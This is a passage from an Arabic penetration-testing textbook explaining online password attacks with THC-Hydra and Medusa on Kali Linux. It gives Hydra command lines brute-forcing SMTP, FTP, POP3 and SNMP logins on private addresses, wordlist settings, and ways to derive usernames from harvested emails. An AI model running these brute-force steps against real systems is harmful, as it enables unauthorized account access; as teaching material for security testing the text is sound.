‫اﻟﺗﻲ ﺗﺗﺿﻣن ﻧوع ﻣن ﺧدﻣﺔ اﻟوﺻول ﻋن ﺑﻌد‪ .‬ﻣﺛل)‪ ، (FTP)،Telnet ، (SSH‬ﺑرﻧﺎﻣﺞ‪ ،VNC ، PCAnywhere‬وﺑروﺗوﻛول ﺳطﺢ‬
‫اﻟﻣﻛﺗب اﻟﺑﻌﯾد )‪ (remote desktop protocol‬ھﻲ اﻟﺧﯾﺎرات اﻷﻛﺛر ﺷﻌﺑﯾﺔ ﻷن اﻟوﺻول إﻟﻰ ھذه اﻟﺧدﻣﺎت ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن ﯾؤدي إﻟﻰ‬
‫اﻟﺳﯾطرة اﻟﻛﺎﻣﻠﺔ ﻟﺟﮭﺎز اﻟﮭدف‪ .‬ﻋﻧد اﻛﺗﺷﺎف واﺣدة ﻣن ھذه اﻟﺧدﻣﺎت‪ ،‬ﻓﺎن اﻟﻣﺗﺳﻠﻠﯾن ﺗﺗﺣول ﻋﺎدة إﻟﻰ "‪.“ Online Password Attack‬‬
‫وﻟﻐرض ھذا اﻟﻛﺗﺎب‪ ،‬ﻓﺳوف ﻧﻘوم ﺑﺗﻌرﯾف " ‪ " Online Password Attack‬ﻋﻠﻰ أﻧﮫ ﺗﻘﻧﯾﺔ ھﺟوم واﻟﺗﻲ ﺗﺗﻔﺎﻋل ﻣﻊ ﺧدﻣﮫ ﺗﻌﻣل اﻻن‬
‫"‪ "live service‬ﻣﺛل ‪ SSH‬أو ‪ Online Password Attack .Telnet‬ﺗﻌﻣل ﻣن ﺧﻼل ﻣﺣﺎوﻟﺔ ‪ brute force Attack‬ﻹﯾﺟﺎد‬
‫طرﯾﻘﮫ إﻟﻰ اﻟﻧظﺎم ﻣن ﺧﻼل ﻣﺣﺎوﻟﺔ اﺳﺗﺧدام ﻗﺎﺋﻣﺔ ﺷﺎﻣﻠﺔ ﻟﻛﻠﻣﺎت اﻟﺳر وأﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن أو ﺗرﻛﯾﺑﺎت‪ .‬ﻓﻲ اﻟﻣﻘﺎﺑل‪ ،‬ﺣﺎﻟﯾﺎ ﺗﻘﻧﯾﺎت ﻛﺳﯾر ﻛﻠﻣﺔ‬
‫اﻟﻣرور )‪ (Offline Password Attack‬ﻻ ﺗﺗطﻠب ان ﺗﻛزن اﻟﺧدﻣﺔ ﻗﯾد اﻟﺗﺷﻐﯾل‪.‬‬
‫ﻋﻧد اﺳﺗﺧدام ‪ ،Online Password Cracker‬ﻓﺎن إﻣﻛﺎﻧﯾﺔ اﻟﻧﺟﺎح ﯾﻣﻛن ان ﺗزﯾد ﺑﻧﺳﺑﮫ ﻛﺑﯾره إذا ﻗﻣت ﺑﺿم ھذا اﻟﮭﺟوم ﻣﻊ اﻟﻣرﺣﻠﺔ‬
‫اﻷوﻟﻰ واﻟﺗﻲ ﯾﺗم ﻓﯾﮭﺎ ﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت ﻓﻲ اﻟﺧطوة ‪ .1‬ﻋﻠﻰ وﺟﮫ اﻟﺗﺣدﯾد ﯾﺟب أن ﺗﺗﺄﻛد ﻣن أﻧﮭﺎ ﺗﺣﺗوي ﻋﻠﻰ أي ﻣن أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن أو‬
‫ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ اﻛﺗﺷﻔت‪ .‬ﻋﻣﻠﯾﺔ ﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور ﻋﺑر اﻹﻧﺗرﻧت )‪ (Online Password Cracker‬ﺗﺗطﻠب ﺣرﻓﯾﺎ ﺑراﻣﺞ اﻟﮭﺟوم‬
‫ﻹرﺳﺎل اﺳم ﻣﺳﺗﺧدم وﻛﻠﻣﺔ ﻣرور ﻟﻠﮭدف‪ .‬ﻓﺈذا ﻛﺎن إﻣﺎ اﺳم اﻟﻣﺳﺗﺧدم أو ﻛﻠﻣﺔ اﻟﻣرور ﻏﯾر ﺻﺣﯾﺣﺔ‪ ،‬ﺳﯾﺗم ﻋرض رﺳﺎﻟﺔ ﺧطﺎ ﻣن ﻗﺑل ﺑرﻧﺎﻣﺞ‬
‫اﻟﮭﺟوم وﺳﺗﻔﺷل ﺗﺳﺟﯾل اﻟدﺧول‪ .‬ﺛم ﺑﻌد ذﻟك ﯾﻘوم ﺑﺎرﺳﺎل ﺗرﻛﯾﺑﺔ ﻣن اﺳم ﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﺎﻟﯾﺔ‪ .‬وﺗﺳﺗﻣر ھذه اﻟﻌﻣﻠﯾﺔ ﺣﺗﻰ ﯾﻧﺟﺢ‬
‫اﻟﺑرﻧﺎﻣﺞ ﻓﻲ اﻟﻌﺛور ﻋﻠﻰ ﺗﺳﺟﯾل اﻟدﺧول‪/‬ﻛﻠﻣﺔ ﻣرور اﻟﺻﺣﯾﺣﺔ أو أﻧﮫ ﯾﻧﮭﻰ ﻛل اﻟﺗﺧﻣﯾﻧﺎت ﺑدون إﯾﺟﺎد ﺷﻲء‪ .‬ﻋﻠﻰ اﻟﻌﻣوم‪ ،‬ﻋﻠﻰ اﻟرﻏم ﻣن أن‬
‫أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻣﮭﯾﺋﮫ ﻟﻣﺛل ھذه ﻣن اﻟﻣﮭﺎم اﻟﻣﺗﻛررة‪ ،‬وﻟﻛن ھذه اﻟﻌﻣﻠﯾﺔ ﺑطﯾﺋﺔ ﻧوﻋﺎ ﻣﺎ‪.‬‬
‫ﻓﻲ ھذه اﻟﺟزء ﺳوف ﻧﺳﺗﺧدم )‪ .THC-Hydra password cracker (Hydra‬ھﻧﺎك أوﻗﺎت اﻟﺗﻲ ﺳﯾﻛون ﻟدﯾﻧﺎ اﻟوﻗت ﻟﻣﮭﺎﺟﻣﺔ ﺟﮭﺎز‬
‫ﻛﻣﺑﯾوﺗر ﯾﻌﻣل ﺑﻧظﺎم اﻟﺗﺷﻐﯾل ‪ Windows‬ﻣﺑﺎﺷرة )‪ (physical attack‬واﻟﺣﺻول ﻋﻠﻰ اﻟﻣﻠف )‪ (SAM‬ﻣﺑﺎﺷرة‪ .‬وﻣﻊ ذﻟك‪ ،‬ﺳوف ﯾﻛون‬
‫ھﻧﺎك أﯾﺿﺎ اﻟوﻗت اﻟذي ﻧﺣن ﻧﻛون ﻓﯾﮫ ﻏﯾر ﻗﺎدرﯾن ﻋﻠﻰ اﻟﻘﯾﺎم ﺑذﻟك‪ ،‬وھذا ھو اﻟﻣﻛﺎن اﻟذي ﯾﺛﺑت ﻓﯾﮫ ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ﻋﺑر ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‬
‫)‪ (Online Password Attack‬اﻷﻛﺛر ﻓﺎﺋدة‪.‬‬
‫ﻣﻠﺣوظﮫ‪ :‬ﯾﺟب أن ﺗﻛون ﻋﻠﻰ ﻋﻠم ﺑﺄن ﺑﻌض اﻟﻧظم اﻟوﺻول ﻋن ﺑﻌد ﺗوظف ﺗﻘﻧﯾﺔ اﺧﺗﻧﺎق ﻛﻠﻣﺔ اﻟﻣرور )‪ (password throttling‬واﻟﺗﻲ‬
‫ﯾﻣﻛن أن ﺗﺣد ﻋدد ﻣرات ﺗﺳﺟﯾل اﻟدﺧول اﻟﻔﺎﺷﻠﺔ اﻟﻣﺳﻣوح ﺑﮭﺎ ﻟك‪ .‬ﻓﻲ ھذه اﻟﺣﺎﻻت‪ ،‬ﯾﻣﻛن أن ﯾﺗم ﺣظر ﻋﻧوان ‪ IP‬اﻟﺧﺎص ﺑك أو ﯾﺗم ﻏﻠﻖ‬
‫اﺳم اﻟﻣﺳﺗﺧدم‪.‬‬
‫ھﻧﺎك اﻟﻌدﯾد ﻣن اﻷدوات اﻟﻣﺧﺗﻠﻔﺔ اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻛﺳر ﻛﻠﻣﺔ ﻋﻠﻰ اﻻﻧﺗرﻧت)‪ . (Online Password Cracker‬اﺛﻧﯾن ﻣن اﻷدوات‬
‫اﻷﻛﺛر ﺷﻌﺑﯾﺔ ھﻲ ﻣﯾدوﺳﺎ )‪(Medusa‬وھﯾدرا)‪ .(Hydra‬ھذه اﻷدوات ﻣﺗﺷﺎﺑﮭﺔ ﺟدا ﻓﻲ طﺑﯾﻌﺔ ﻋﻣﻠﮭﺎ‪.‬‬
‫أي ﺧدﻣﺔ )‪(service‬ﻣوﺟودة ﻋﻠﻰ اﻟﺷﺑﻛﺔ ﺗطﻠب ﻣن اﻟﻣﺳﺗﺧدم ﺗﺳﺟﯾل اﻟدﺧول ھﻲ ﻋرﺿﺔ ﻟﮭﺟوم اﻟﺗﺧﻣﯾن)‪. (password guessing‬‬
‫وﺗﺷﻣل ﺧدﻣﺎت اﻟﺷﺑﻛﺔ ﻣﺛل ‪ ،SQL ،IM ،LDAP ،TELNET ،SSH ،RDP ،SMB ،VNC ،IMAP ،POP3 ،HTTP‬وأﻛﺛر‬
‫ﻣن ذﻟك‪ .‬ھﺟوم ﻛﻠﻣﺔ اﻟﺳر ﻋﺑر اﻹﻧﺗرﻧت )‪ (Online Password Attack‬ﯾﻧطوي ﻋﻠﻰ إﺗﻣﺎم ﻋﻣﻠﯾﺔ اﻟﺗﺧﻣﯾن ﻣن أﺟل ﺗﺳرﯾﻊ اﻟﮭﺟوم‬
‫وﺗﺣﺳﯾن ﻓرص اﻟﺗﺧﻣﯾن اﻟﻧﺎﺟﺣﺔ‪.‬‬

‫)‪THC-Hydra Password Cracker (Hydra‬‬

‫اﻟﻣﺻدر‪http://www.thc.org :‬‬
‫رﻗم واﺣد ﻓﻲ أﻛﺑر اﻟﺛﻐرات اﻷﻣﻧﯾﺔ ھﻲ ﻛﻠﻣﺎت اﻟﺳر‪ ،‬ﻛﻣﺎ ﯾظﮭر ﻓﻲ ﻛل دراﺳﺔ ﺣول أﻣﺎن ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪366‬‬

‫‪ Hydra‬ھﻲ أداه ﺗم ﺗطوﯾرھﺎ ﻣن ﻗﺑل )‪ The Hacker's Choice (THC‬واﻟﺗﻲ ﺗﺳﺗﺧدم أﺳﻠوب ھﺟوم ‪ brute force‬ﻟﻼﺧﺗﺑﺎر ﺿد‬
‫ﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن اﻟﺑروﺗوﻛوﻻت اﻟﻣﺧﺗﻠﻔﺔ‪ .‬ھﻲ اﻷداة اﻟﻣﺛﺎﻟﯾﺔ ﻟﻣﮭﺎﺟﻣﺔ أﻧظﻣﺔ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﺣﯾث ان ‪ Hydra‬ﯾﻣﻛﻧﮭﺎ اﺳﺗﮭداف ‪IP‬‬
‫وﺑروﺗوﻛول ﻣﺣددة ﻣﺛل ﺣﺳﺎب اﻟﻣﺷرف ل ‪ POP3‬و ‪SMTP‬اﻟﻣﺳﺗﺧدﻣﺔ ﻣن ﻗﺑل أﻧظﻣﺔ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪.‬‬
‫ﺗم اﺧﺗﺑﺎر ‪ Hydra‬ﻟﻛﻲ ﺗﻌﻣل ﺟﯾدا ﻋﻠﻰ أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ‪ FreeBSD 8.1 ،Solaris 11 ،Windows/Cygwin ،Linux‬و‪.OSX‬‬
‫‪ Hydra‬ﺗدﻋم اﻟﻌدﯾد ﻣن اﻟﺑروﺗوﻛوﻻت‪ ،‬واﻟﺗﻲ ﺗﺷﻣل اﻻﺗﻲ‪:‬‬

‫ﯾﺗﺿﻣن ھﯾدرا دﻋم ‪ SSL‬وﺟزء ﻣن ‪ .Nessus‬ھﯾدرا ﯾدﻋم ﻋدد ﻛﺑﯾر ﻣن اﻟﺑروﺗوﻛوﻻت واﻟﺗﻲ ﺗﻌرف ب‪. password brute force tool‬‬
‫ﻟﻛن ﯾﺟب ان ﺗﻛون ﻋﻠﻰ ﺣذر ﻋﻠﻰ اﻟرﻏم ﻣن ذﻟك‪ ،‬ﻷن ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﯾﻣﻛن أن ﯾﻛون ﺻﺎﺧﺑﺎ ﺑﻌض اﻟﺷﻲء‪ ،‬ﻣﻣﺎ ﯾزﯾد ﻣن ﻓرﺻﺔ‬
‫اﻟﻛﺷف ﻋﻧك‪ .‬ھذه اﻷداة ھو دﻟﯾل ﻣن اﻟﺗﻌﻠﯾﻣﺎت اﻟﺑرﻣﺟﯾﺔ اﻟﻣﻔﮭوﻣﺔ‪ ،‬وذﻟك ﻹﻋطﺎء اﻟﺑﺎﺣﺛﯾن واﺳﺗﺷﺎري اﻷﻣن اﻣﻛﺎﻧﯾﺔ اظﮭﺎر ﻛﯾف أﻧﮫ ﺳﯾﻛون‬
‫ﻣن اﻟﺳﮭل اﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ ﻣن ﺑﻌﯾد إﻟﻰ اﻟﻧظﺎم‪.‬‬
‫ﻗﺑل إطﻼق ھﯾدرا‪ ،‬ﯾﺟب إﺟراء ﻋﻣﻠﯾﺔ اﻻﺳﺗطﻼع ﻋﻠﻰ اﻟﮭدف ﻣﺛل ﻧظﺎم اﻟﺑرﯾد ﻛﻣﺎ ﺗم ﺷرﺣﮫ ﻓﻲ اﻟﻔﺻول اﻟﺳﺎﺑﻘﺔ‪ .‬ﻣﺛل اﻷداة ‪.nmap‬‬
‫ﻟﻠوﺻول اﻟﻰ ھﯾدرا ﻣن ﻛﺎﻟﻲ‪ ،‬ﯾﻣﻛﻧك ذﻟك ﻣن ﺧﻼل ﻗﺎﺋﻣﺔ أدوات ﻛﺎﻟﻲ ﻧﻧﺗﻘل إﻟﻰ‬
‫‪Password Attacks | Online Attacks | Hydra‬‬
‫وھذا ﺳوف ﯾﻔﺗﺢ ﻟك ﻧﺎﻓذة اﻟﺗرﻣﻧﺎل واﻟﺗﻲ ﺳوف ﺗﻘوم ﺑﺗﺷﻐﯾل ھﯾدرا‪.‬‬

‫ﺗوﺿﺢ اﻟوﺛﺎﺋﻖ ﻛﯾﻔﯾﺔ ﺗﺷﻐﯾل ھﯾدرا‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬إذا ﻛﻧت ﺗرﯾد أن ﺗﮭﺎﺟم ﻣﻠف ﻛﻠﻣﺔ اﻟﻣرور ﻟﺣﺳﺎب ﻣﺷرف اﻟذي ﯾﻘﻊ ﻓﻲ‬
‫‪ 192.168.1.1‬ﺑﺎﺳﺗﺧدام‪ ، SMTP‬ﺳﺗﻛﺗب اﻻﺗﻲ‪:‬‬
‫‪#hydra -l admin -p /root/password.txt 192.168.1.1 smtp‬‬
‫اﻟﺗﻌﺑﯾر ‪ –P‬ﯾﺷﯾر اﻟﻰ اﻟﻣﺳﺎر اﻟذي ﯾوﺟد ﺑﮫ ﻗﺎﺋﻣﺔ ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺳوف ﯾﺳﺗﺧدﻣﮭﺎ‪ ،‬و ‪ –L‬ﯾﺷﯾر اﻟﻰ ﻗﺎﺋﻣﺔ أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن‪.‬‬
‫ﻟﻠﮭﯾدرا أﯾﺿﺎ واﺟﮭﮫ رﺳوﻣﯾﮫ واﻟﺗﻲ ﯾﻣﻛﻧك اﺳﺗﺧداﻣﮭﺎ إذا ﻛﻧت ﺗﻔﺿل اﺳﺗﺧدام اﻟوﺟﮫ اﻟرﺳوﻣﯾﺔ ﺳواء ﻓﻲ ﻟﯾﻧﻛس او وﯾﻧدوز‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪367‬‬

‫ﻟﻠوﺻول اﻟﻰ واﺟﮭﺔ اﻟﻣﺳﺗﺧدم اﻟرﺳوﻣﯾﺔ ‪ hydra-gtk‬ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﻋن طرﯾﻖ اﺗﺑﺎع اﻻﺗﻲ‪:‬‬
‫‪Applications | Kali Linux | Password Attacks | Online Attacks | hydra-gtk‬‬
‫ﻋﻧد اﻟﺿﻐط ﻋﻠﯾﮫ ﺗظﮭر اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫اﻵن ﺑﻌد أن ﺑدأﻧﺎ ﻣﻊ ھﯾدرا‪ ،‬ﻓﻧﺣن ﺳوف ﻧﺣﺗﺎج إﻟﻰ ﺗﻌﯾﯾن ﻗواﺋم اﻟﻛﻠﻣﺎت )‪ .(Word list‬ﻧﻧﻘر ﻓوق ﻋﻼﻣﺔ اﻟﺗﺑوﯾب ‪ .Passwords‬ﺳوف‬
‫ﻧﺳﺗﺧدم ﻗﺎﺋﻣﺔ اﺳم اﻟﻣﺳﺗﺧدم وﻗﺎﺋﻣﺔ ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﯾﺗم ذﻟك ﺑﺈدﺧﺎل اﺳم اﻟﻣوﻗﻊ ﻟﻘﺎﺋﻣﺔ اﺳم اﻟﻣﺳﺗﺧدم وﻗﺎﺋﻣﺔ ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑك‪ .‬وﻧﺧﺗﺎر‬
‫أﯾﺿﺎ ‪ Loop around users‬و‪.Try empty password‬‬
‫ھﻧﺎ ﻓﻲ ﻣﺛﺎﻟﻧﺎ ھذا ﺳوف ﻧﺧﺗﺎر اﻟﻘواﺋم اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪Username List: /usr/share/wfuzz/wordlist/fuzzdb/wordlistsuser-passwd/names/nameslist.txt‬‬
‫‪Password List: /usr/share/wfuzz/wordlist/fuzzdb/wordlistsuser-passwd/passwds/john.txt‬‬

‫اﻟﺧطوة اﻟﻣﻘﺑﻠﺔ‪ ،‬ﺳوف ﻧﻘوم ﺑﺗﺣدﯾد طﺑﯾﻌﺔ اﻟﮭﺟوم وﯾﺗم ذﻟك ﺑﺎﻟﻧﻘر ﻓوق ﻋﻼﻣﺔ اﻟﺗﺑوﯾب ‪ .Tuning‬ﺗﺣت اﻟﺧﯾﺎر ‪،Performance Options‬‬
‫ﻧﻘوم ﺑوﺿﻊ ﻋدد اﻟﻣﮭﺎم )‪ (Number of tasks‬ﻣن ‪ 16‬اﻟﻰ ‪ .2‬واﻟﺳﺑب ﻓﻲ ذﻟك ھو أﻧﻧﺎ ﻻ ﻧرﯾد ھذا اﻟﻌدد اﻟﻛﺑﯾر ﻣن اﻟﻌﻣﻠﯾﺎت اﻟﺟﺎرﯾﺔ واﻟﺗﻲ‬
‫ﻣن اﻟﻣﻣﻛن ان ﺗﺳﻘط اﻟﺧﺎدم‪ .‬ﻧﺣن ﻧرﯾد أﯾﺿﺎ أن ﺗﻌﯾﯾن اﻟﺧﯾﺎر ‪ Exit after first found pair‬وھذا اﺧﺗﯾﺎري ﻋﻠﻰ ﺣﺳب اﻟرﻏﺑﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪368‬‬

‫اﻣﺎ اﻟﺟزء اﻟﺛﺎﻧﻲ اﻟﻣوﺟود ﺗﺣت اﻟﺧﯾﺎر ‪ Use a HTTP/HTTPS Proxy‬ﻓﮭو اﻟﻣﺳﺋول ﻋن إﻋدادت اﻟﺑروﻛﺳﻲ‪.‬‬

‫أﺧﯾرا‪ ،‬ﺳوف ﻧذھب ﺑﻌد اﻟﻰ ھدﻓﻧﺎ‪ .‬ﻧﻧﻘر ﻓوق ﻋﻼﻣﺔ اﻟﺗﺑوﯾب ‪ Target‬وﻧﺣدد ھدﻓﻧﺎ واﻟﺑروﺗوﻛول اﻟذي ﻧود أن ﻧﮭﺎﺟﻣﮫ‪.‬‬

‫وأﺧﯾرا‪ ،‬ﻓﺈﻧﻧﺎ ﻧﻘوم ﺑﺗﻧﻔﯾذ ‪ exploit‬ﻣن ﺧﻼل اﻟﻧﻘر ﻋﻠﻰ ﻋﻼﻣﺔ اﻟﺗﺑوﯾب ‪ Start‬واﻟﺿﻐط ﻋﻠﻰ زر اﻟﺑدء ‪.Start‬‬
‫وﻋﻧد إﯾﺟﺎد ﻧﺗﯾﺟﺔ ﺳوف ﺗظﮭر ﻣﺛل اﻟﺷﻛل اﻻﺗﻲ‪:‬‬

‫ﻣن ﺧﻼل ﺷﺎﺷﮫ ‪ target‬ﯾﻣﻛﻧك ادﺧﺎل اﻟﻌدﯾد ﻣن اﻟﺑروﺗوﻛوﻻت اﻟﺗﻲ ﯾدﻋﻣﮭﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


369

:‫ﻓﻲ ﯾﻠﻲ ﺑﻌض اﻷﻣﺛﻠﺔ ﻻﺳﺗﺧدام اﻟﮭﯾدرا ﻣﻊ اﻟﺑروﺗوﻛوﻻت اﻟﻣﺧﺗﻠﻔﺔ ﻣن ﺧﻼل ﺳطر اﻷواﻣر ﻛﺎﻻﺗﻰ‬
#hydra -l ftp -P passwords.txt -v 192.168.0.112 ftp
#hydra -l muts -P passwords.txt -v 192.168.0.112 pop3
#hydra -P passwords.txt -v 192.168.0.112 snmp

Medusa: Gaining Access to Remote Services


‫ اﻟﻣﯾدوﺳﺎ ﻗﺎدره‬.‫ واﻟذي ﯾﺣﺎول اﻟوﺻول إﻟﻰ ﺧدﻣﺎت اﻟﺗوﺛﯾﻖ ﻋن ﺑﻌد‬brute forcer ‫ﺗم وﺻف اﻟﻣﯾدوﺳﺎ ﻋﻠﻰ اﻧﮫ ﺗﺳﺟﯾل دﺧول ﻣوازي ﺑﺎل‬
Microsoft SQL ‫ و‬IMAP ،HTTP ،FTP ،Apple filing protocol ‫ﻋﻠﻰ اﻟﻣﺻﺎدﻗﺔ ﻣﻊ ﻋدد ﻛﺑﯾر ﻣن اﻟﺧدﻣﺎت ﻋن ﺑﻌد ﺑﻣﺎ ﻓﻲ ذﻟك‬
،POP3 ،PCAnywhere ‫ وﺑرﻧﺎﻣﺞ‬،network news transfer(NNTP) ،NetWare core protocol(NCP) ،MySQL‫و‬
،VNC ،Telnet‫و‬SSHv2 ،simple mail transfer protocol authentication(SMB) ،RLOGIN ،REXEC
.‫ وأﻛﺛر ﻣن ذﻟك‬، (Web forms)‫ ﻧﻣﺎذج اﻟوﯾب‬،simple network management protocol(SNMP)
.[medusa –d] ‫– ﻛﺎﻻﺗﻰ‬d ‫وﻟرؤﯾﺔ ﺟﻣﯾﻊ اﻟﺑروﺗوﻛوﻻت اﻟﺗﻲ ﯾدﻋﻣﮭﺎ ﯾﻣﻛﻧك ذﻟك ﻣن ﺧﻼل اﺳﺗﺧدام اﻟﺗﻌﺑﯾر‬

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


‫‪370‬‬

‫ﯾﻣﻛن أﯾﺿﺎ اﻟوﺻول اﻟﻰ ‪ Medusa‬ﻋن طرﯾﻖ اﺗﺑﺎع اﻻﺗﻲ‪:‬‬


‫‪Applications | Kali Linux | Password Attacks | Online Attacks | medusa.‬‬

‫ﻣن أﺟل اﺳﺗﺧدام ﻣﯾدوﺳﺎ‪ ،‬ﺗﺣﺗﺎج اﻟﻰ ﻋدة ﻗطﻊ ﻣن اﻟﻣﻌﻠوﻣﺎت ﺑﻣﺎ ﻓﻲ ذﻟك ﻋﻧوان ‪ IP‬اﻟﮭدف‪ ،‬اﺳم ﻣﺳﺗﺧدم أو ﻗﺎﺋﻣﺔ اﺳم اﻟﻣﺳﺗﺧدم اﻟﺗﻲ ﺗﺣﺎول‬
‫اﺳﺗﺧداﻣﮭﺎ ﻓﻲ ﺗﺳﺟﯾل اﻟدﺧول وﻛﻠﻣﺔ ﻣرور أو ﻣﻠف اﻟﻘﺎﻣوس اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﻌدﯾد ﻣن ﻛﻠﻣﺎت اﻟﻣرور ﻻﺳﺗﺧداﻣﮭﺎ ﻋﻧد ﺗﺳﺟﯾل اﻟدﺧول‪،‬‬
‫واﺳم اﻟﺧدﻣﺔ اﻟﺗﻲ ﺗﺣﺎول اﻟﻣﺻﺎدﻗﺔ ﻣﻌﮭﺎ وھذا ﻛﻣﺎ ﻓﻌﻠﻧﺎ ﺳﺎﺑﻘﺎ ﻣﻊ اﻟﮭﯾدرا‪.‬‬

‫واﺣدة ﻣن اﻟﻣﺗطﻠﺑﺎت اﻟﻣذﻛورة أﻋﻼه ھﻲ ﻗﺎﺋﻣﺔ اﻟﻘﺎﻣوس)‪ . (Dictionary list‬ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن اﻧﺷﺎء ﻗﺎﻣوس ﻛﻠﻣﺔ اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك‪،‬‬
‫ﻓﻌﻠﯾك أن ﺗﻘرر إذا ﻛﻧت ﺗﺳﯾر ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﺗﺳﺟﯾل اﻟدﺧول ﺑﺎﺳم ﻣﺳﺗﺧدم واﺣد أو إذا ﻛﻧت ﺗرﻏب ﻓﻲ ﺗوﻓﯾر ﻗﺎﺋﻣﺔ ﻣن اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﺣﺗﻣﻠﯾن‪.‬‬
‫إذا ﻛﺎﻧت ﻣﻛﺎﻓﺄة ﻋﻣﻠﯾﺔ اﻻﺳﺗطﻼع اﻟﺧﺎص ﺑك ھﻲ ﻗﺎﺋﻣﺔ ﻣن أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن‪ ،‬ﻓﻘد ﺗرﯾد أن ﺗﺑدأ ﻣﻊ ھؤﻻء‪ .‬إذا ﻛﻧت ﻟم ﺗﻧﺟﺢ ﻓﻲ ﺟﻣﻊ أﺳﻣﺎء‬
‫اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور‪ ،‬ﻓﻘد ﺗرﻏب ﻓﻲ اﻟﺗرﻛﯾز ﻋﻠﻰ اﻟﻧﺗﺎﺋﺞ ﻣن ﻋﻧﺎوﯾن اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﺗﻲ ﺗم ﺟﻣﻌﮭﺎ ﻣﻊ ‪ .harvester‬ﺗذﻛر‪ ،‬ﯾﻣﻛن‬
‫ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن أن اﻟﺟزء اﻷول ﻣن ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮫ ﻓﻲ ﺗوﻟﯾد اﺳم اﻟﻣﺳﺗﺧدم ﻟدوﻣﯾن‪.‬‬
‫ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬اﻓﺗرض أﻧﮫ ﺧﻼل اﺧﺗﺑﺎر اﻻﺧﺗراق اﻟﺧﺎص ﻟم ﺗﺗﻣﻛن ﻣن اﻟﻌﺛور ﻋﻠﻰ أي ﻣن أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن ﻟﻠدوﻣﯾن‪ .‬وﻣﻊ ذﻟك‪ ،‬ﻛﻧت‬
‫ﻗﺎدرا ﻋﻠﻰ ﻧﺑش ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ . ben.owned@example.com‬ﻋﻧد اﺳﺗﺧدام ﻣﯾدوﺳﺎ‪ ،‬ﯾوﺟد ﺧﯾﺎر وھو إﻧﺷﺎء ﻗﺎﺋﻣﺔ ﻷﺳﻣﺎء‬
‫اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﺣﺗﻣﻠﯾن اﺳﺗﻧﺎدا إﻟﻰ ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ .‬وﺗﺷﻣل ھذه ‪ ،ownedb ،bowned ،benowned ،ben.owned‬وﻋدة‬
‫ﻣﺟﻣوﻋﺎت أﺧرى ﻣﺷﺗﻘﺔ ﻣن ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ .‬ﺑﻌد إﻧﺷﺎء ﻗﺎﺋﻣﺔ ﻣن ‪ 10-5‬أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن‪ ،‬ﻓﻣن اﻟﻣﻣﻛن ﺗﻐذﯾﺔ ھذه اﻟﻘﺎﺋﻣﺔ اﻟﻰ‬
‫ﻣﯾدوﺳﺎ وﻣﺣﺎوﻟﺔ دﻓﻊ ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ )‪ (brute force attack‬اﻟﻰ طرﯾﻖ ﺧدﻣﺔ اﻟﻣﺻﺎدﻗﺔ ﻋن ﺑﻌد‪.‬‬

